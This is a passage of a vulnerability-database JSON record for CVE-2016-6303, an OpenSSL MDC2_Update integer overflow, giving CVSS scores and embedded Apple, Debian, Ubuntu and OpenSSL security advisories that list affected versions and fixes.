"cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-6303" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-320" } ], "trust": 0.6 }, "cve": "CVE-2016-6303", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": true, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2016-6303", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2016-6303", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-6303", "trust": 1.8, "value": "CRITICAL" }, { "author": "CNNVD", "id": "CNNVD-201609-320", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2016-6303", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6303" }, { "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "db": "NVD", "id": "CVE-2016-6303" }, { "db": "CNNVD", "id": "CNNVD-201609-320" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Integer overflow in the MDC2_Update function in crypto/mdc2/mdc2dgst.c in OpenSSL before 1.1.0 allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors. OpenSSL of crypto/mdc2/mdc2dgst.c of MDC2_Update The function contains an integer overflow vulnerability. Supplementary information : CWE Vulnerability type by CWE-787: Out-of-bounds Write ( Out-of-bounds writing ) Has been identified. http://cwe.mitre.org/data/definitions/787.htmlService disruption by a third party ( Out-of-bounds writes and application crashes ) There is a possibility of being affected unspecified, such as being in a state. OpenSSL is prone to an integer-overflow vulnerability. \nAn attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. \nOpenSSL versions prior to 1.1.0 are affected. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-12-13-1 macOS 10.12.2\n\nmacOS 10.12.2 is now available and addresses the following:\n\napache_mod_php\nAvailable for: macOS Sierra 10.12.1\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: Multiple issues existed in PHP before 5.6.26. These were\naddressed by updating PHP to version 5.6.26. \nCVE-2016-7411\nCVE-2016-7412\nCVE-2016-7413\nCVE-2016-7414\nCVE-2016-7416\nCVE-2016-7417\nCVE-2016-7418\n\nAppleGraphicsPowerManagement\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-7609: daybreaker@Minionz working with Trend Micro\u0027s Zero Day\nInitiative\n\nAssets\nAvailable for: macOS Sierra 10.12.1\nImpact: A local attacker may modify downloaded mobile assets\nDescription: A permissions issue existed in mobile assets. This issue\nwas addressed through improved access restrictions. \nCVE-2016-7628: an anonymous researcher\n\nAudio\nAvailable for: macOS Sierra 10.12.1\nImpact: Processing a maliciously crafted file may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2016-7658: Haohao Kong of Keen Lab (@keen_lab) of Tencent\nCVE-2016-7659: Haohao Kong of Keen Lab (@keen_lab) of Tencent\n\nBluetooth\nAvailable for: macOS Sierra 10.12.1, OS X El Capitan v10.11.6,\nand OS X Yosemite v10.10.5\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through improved\nmemory handling. \nCVE-2016-7596: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of\nSynopsys Software Integrity Group\n\nBluetooth\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-7605: daybreaker of Minionz\n\nBluetooth\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to execute arbitrary code with\nsystem privileges\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-7617: Radu Motspan working with Trend Micro\u0027s Zero Day\nInitiative, Ian Beer of Google Project Zero\n\nCoreCapture\nAvailable for: macOS Sierra 10.12.1 and OS X El Capitan v10.11.6\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved state management. \nCVE-2016-7604: daybreaker of Minionz\n\nCoreFoundation\nAvailable for: macOS Sierra 10.12.1\nImpact: Processing malicious strings may lead to an unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nstrings. This issue was addressed through improved bounds checking. \nCVE-2016-7663: an anonymous researcher\n\nCoreGraphics\nAvailable for: macOS Sierra 10.12.1\nImpact: Processing a maliciously crafted font file may lead to\nunexpected application termination\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-7627: TRAPMINE Inc. \u0026 Meysam Firouzi @R00tkitSMM\n\nCoreMedia External Displays\nAvailable for: macOS Sierra 10.12.1\nImpact: A local application may be able to execute arbitrary code in\nthe context of the mediaserver daemon\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-7655: Keen Lab working with Trend Micro\u0027s Zero Day\nInitiative\n\nCoreMedia Playback\nAvailable for: macOS Sierra 10.12.1\nImpact: Processing a maliciously crafted .mp4 file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through improved\nmemory handling. \nCVE-2016-7588: dragonltx of Huawei 2012 Laboratories\n\nCoreStorage\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-7603: daybreaker@Minionz working with Trend Micro\u0027s Zero Day\nInitiative\n\nCoreText\nAvailable for: macOS Sierra 10.12.1\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-2016-7595: riusksk(ae3aY=) of Tencent Security Platform\nDepartment\n\ncurl\nAvailable for: macOS Sierra 10.12.1\nImpact: An attacker in a privileged network position may be able to\nleak sensitive user information\nDescription: Multiple issues existed in curl. These issues were\naddressed by updating to curl version 7.51.0. \nCVE-2016-5419\nCVE-2016-5420\nCVE-2016-5421\nCVE-2016-7141\nCVE-2016-7167\nCVE-2016-8615\nCVE-2016-8616\nCVE-2016-8617\nCVE-2016-8618\nCVE-2016-8619\nCVE-2016-8620\nCVE-2016-8621\nCVE-2016-8622\nCVE-2016-8623\nCVE-2016-8624\nCVE-2016-8625\n\nDirectory Services\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to gain root privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-2016-7633: Ian Beer of Google Project Zero\n\nDisk Images\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2016-7616: daybreaker@Minionz working with Trend Micro\u0027s Zero Day\nInitiative\n\nFontParser\nAvailable for: macOS Sierra 10.12.1\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-2016-4691: riusksk(ae3aY=) of Tencent Security Platform\nDepartment\n\nFontParser\nAvailable for: macOS Sierra 10.12.1\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A buffer overflow existed in the handling of font files. \nThis issue was addressed through improved bounds checking. \nCVE-2016-4688: Simon Huang of Alipay company,\nthelongestusernameofall@gmail.com\n\nFoundation\nAvailable for: macOS Sierra 10.12.1\nImpact: Opening a maliciously crafted .gcx file may lead to\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2016-7618: riusksk(ae3aY=) of Tencent Security Platform\nDepartment\n\nGrapher\nAvailable for: macOS Sierra 10.12.1\nImpact: Opening a maliciously crafted .gcx file may lead to\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2016-7622: riusksk(ae3aY=) of Tencent Security Platform\nDepartment\n\nICU\nAvailable for: macOS Sierra 10.12.1\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through improved\nmemory handling. \nCVE-2016-7594: AndrA(c) Bargull\n\nImageIO\nAvailable for: macOS Sierra 10.12.1\nImpact: A remote attacker may be able to leak memory\nDescription: An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-7643: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\nIntel Graphics Driver\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2016-7602: daybreaker@Minionz working with Trend Micro\u0027s Zero Day\nInitiative\n\nIOAcceleratorFamily\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to determine kernel memory layout\nDescription: A shared memory issue was addressed through improved\nmemory handling. \nCVE-2016-7624 : Qidan He (@flanker_hqd) from KeenLab working with\nTrend Micro\u0027s Zero Day Initiative\n\nIOFireWireFamily\nAvailable for: macOS Sierra 10.12.1\nImpact: A local attacker may be able to read kernel memory\nDescription: A memory corruption issue was addressed through improved\nmemory handling. \nCVE-2016-7608: Brandon Azad\n\nIOHIDFamily\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through improved\nmemory handling. \nCVE-2016-1823: Ian Beer of Google Project Zero\n\nIOHIDFamily\nAvailable for: macOS Sierra 10.12.1\nImpact: A local application with system privileges may be able to\nexecute arbitrary code with kernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-2016-7591: daybreaker of Minionz\n\nIOKit\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to determine kernel memory layout\nDescription: A shared memory issue was addressed through improved\nmemory handling. \nCVE-2016-7625: Qidan He (@flanker_hqd) from KeenLab working with\nTrend Micro\u0027s Zero Day Initiative\n\nIOKit\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to read kernel memory\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2016-7657: Keen Lab working with Trend Micro\u0027s Zero Day\nInitiative\n\nIOSurface\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to determine kernel memory layout\nDescription: A shared memory issue was addressed through improved\nmemory handling. \nCVE-2016-7620: Qidan He (@flanker_hqd) from KeenLab working with\nTrend Micro\u0027s Zero Day Initiative\n\nKernel\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed through\nimproved input validation. \nCVE-2016-7606: @cocoahuke, Chen Qin of Topsec Alpha Team (topsec.com)\nCVE-2016-7612: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to read kernel memory\nDescription: An insufficient initialization issue was addressed by\nproperly initializing memory returned to user space. \nCVE-2016-7607: Brandon Azad\n\nKernel\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to cause a system denial of service\nDescription: A denial of service issue was addressed through improved\nmemory handling. \nCVE-2016-7615: The UK\u0027s National Cyber Security Centre (NCSC)\n\nKernel\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to cause an unexpected system\ntermination or arbitrary code execution in the kernel\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-2016-7621: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to gain root privileges\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2016-7637: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: macOS Sierra 10.12.1\nImpact: A local application with system privileges may be able to\nexecute arbitrary code with kernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-2016-7644: Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: macOS Sierra 10.12.1\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through improved\ninput validation. \nCVE-2016-7629: @cocoahuke\n\nlibarchive\nAvailable for: macOS Sierra 10.12.1\nImpact: A local attacker may be able to overwrite existing files\nDescription: A validation issue existed in the handling of symlinks. \nThis issue was addressed through improved validation of symlinks. \nCVE-2016-7619: an anonymous researcher\n\nLibreSSL\nAvailable for: macOS Sierra 10.12.1 and OS X El Capitan v10.11.6\nImpact: An attacker with a privileged network position may be able to\ncause a denial of service\nDescription: A denial of service issue in unbounded OCSP growth was\naddressed through improved memory handling. \nCVE-2016-6304\n\nOpenLDAP\nAvailable for: macOS Sierra 10.12.1\nImpact: An attacker may be able to exploit weaknesses in the RC4\ncryptographic algorithm\nDescription: RC4 was removed as a default cipher. \nCVE-2016-1777: Pepi Zawodsky\n\nOpenPAM\nAvailable for: macOS Sierra 10.12.1\nImpact: A local unprivileged user may gain access to privileged\napplications\nDescription: PAM authentication within sandboxed applications failed\ninsecurely. This was addressed with improved error handling. This issue\nwas addressed through improved input validation. \nCVE-2016-6303\n\nOpenSSL\nAvailable for: macOS Sierra 10.12.1\nImpact: An attacker with a privileged network position may be able to\ncause a denial of service\nDescription: A denial of service issue in unbounded OCSP growth was\naddressed through improved memory handling. \nCVE-2016-6304\n\nPower Management\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to gain root privileges\nDescription: An issue in mach port name references was addressed\nthrough improved validation. \nCVE-2016-7661: Ian Beer of Google Project Zero\n\nSecurity\nAvailable for: macOS Sierra 10.12.1\nImpact: An attacker may be able to exploit weaknesses in the 3DES\ncryptographic algorithm\nDescription: 3DES was removed as a default cipher. \nCVE-2016-4693: GaA\u003c\u003ctan Leurent and Karthikeyan Bhargavan from INRIA\nParis\n\nSecurity\nAvailable for: macOS Sierra 10.12.1\nImpact: An attacker in a privileged network position may be able to\ncause a denial of service\nDescription: A validation issue existed in the handling of OCSP\nresponder URLs. This issue was addressed by verifying OCSP revocation\nstatus after CA validation and limiting the number of OCSP requests\nper certificate. \nCVE-2016-7636: Maksymilian Arciemowicz (cxsecurity.com)\n\nSecurity\nAvailable for: macOS Sierra 10.12.1\nImpact: Certificates may be unexpectedly evaluated as trusted\nDescription: A certificate evaluation issue existed in certificate\nvalidation. This issue was addressed through additional validation of\ncertificates. \nCVE-2016-7662: Apple\n\nsyslog\nAvailable for: macOS Sierra 10.12.1\nImpact: A local user may be able to gain root privileges\nDescription: An issue in mach port name references was addressed\nthrough improved validation. \nCVE-2016-7660: Ian Beer of Google Project Zero\n\nmacOS 10.12.2 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttps://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJYT7LKAAoJEIOj74w0bLRGfKwQAN3nnwHgJNE+obIjTzpTHLlh\nmMQYstsO8Mcj4hjIgTCHuQr1tDldva0IZEivoYAbyXAgM9xKlIbpqBQ5TE94l3nl\nxTTeVqtozCCdRT36mphvwhPEp38lvclUU1IGxyvP6ieK0dHUKS8LhL9MpnaOinrX\nUhSiXkMs9tTZI5SgkumzBmg10oOwDnMvZDrwTcxe9vjU26V9S7+VpfsguefwDSLE\nfHYX4KksoEUZuDdUBrfX2+03QbqYxBjQR9IRdpcX56laq1TGUMTKwkTi9DxJlByP\nSJl3uvVhqWf1UkYH6x5N/gC9lXq5QO6L7W3W2rRqTtgr2UMPZsBuf0srK/lFmPvC\nc63thvcZyPk0cDcE7k0ZmlJx+7ihFIiPKdGwLoX5Rl6Zr29Wh9aGKhzUUYO12PUh\n+x18HRwXxvSv9TXAUYQu5hD48SuhUiMEBO8Qq7Z8XPFEUSJXY2AjGjai9mJYNfC4\nOELKPPvYnNSd3m8YGvWY8gWgwyRP0es6U3d5rGatEpA1qcIFmUrHFhpvveL6SRSY\nxPQgjB/aohg/fDf3jDO1kjR7+v83B+ObbCr8MOgqGNtG3GqOimMOa8XuSMbV7+3u\n0kivBY8fxYdBy0pXDdBgv+AHaTue+wgP5tQXFiAxm61Fv+uz/yvR22uaJ39P5cJf\nmsyz+/zQNISkly6K0VBO\n=0QW0\n-----END PGP SIGNATURE-----\n\n\n\n. Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) cryptographic library and tools\n\nDetails:\n\nUSN-3087-1 fixed vulnerabilities in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. (CVE-2016-6304)\n Guido Vranken discovered that OpenSSL used undefined behaviour when\n performing pointer arithmetic. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2179)\n Shi Lei discovered that OpenSSL incorrectly handled memory in the\n TS_OBJ_print_bio() function. (CVE-2016-2180)\n It was discovered that the OpenSSL incorrectly handled the DTLS anti-replay\n feature. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. A remote attacker could\n possibly use this flaw to obtain clear text data from long encrypted\n sessions. This update moves DES from the HIGH cipher list to MEDIUM. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. \n (CVE-2016-6302)\n Shi Lei discovered that OpenSSL incorrectly handled memory in the\n MDC2_Update() function. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-3087-2\n http://www.ubuntu.com/usn/usn-3087-1\n https://launchpad.net/bugs/1626883\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5\n https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21\n https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38\n\n\n. \nOpenSSL Security Advisory [22 Sep 2016]\n========================================\n\nOCSP Status Request extension unbounded memory growth (CVE-2016-6304)\n=====================================================================\n\nSeverity: High\n\nA malicious client can send an excessively large OCSP Status Request extension. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. This will eventually lead to a Denial Of Service attack through memory\nexhaustion. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei 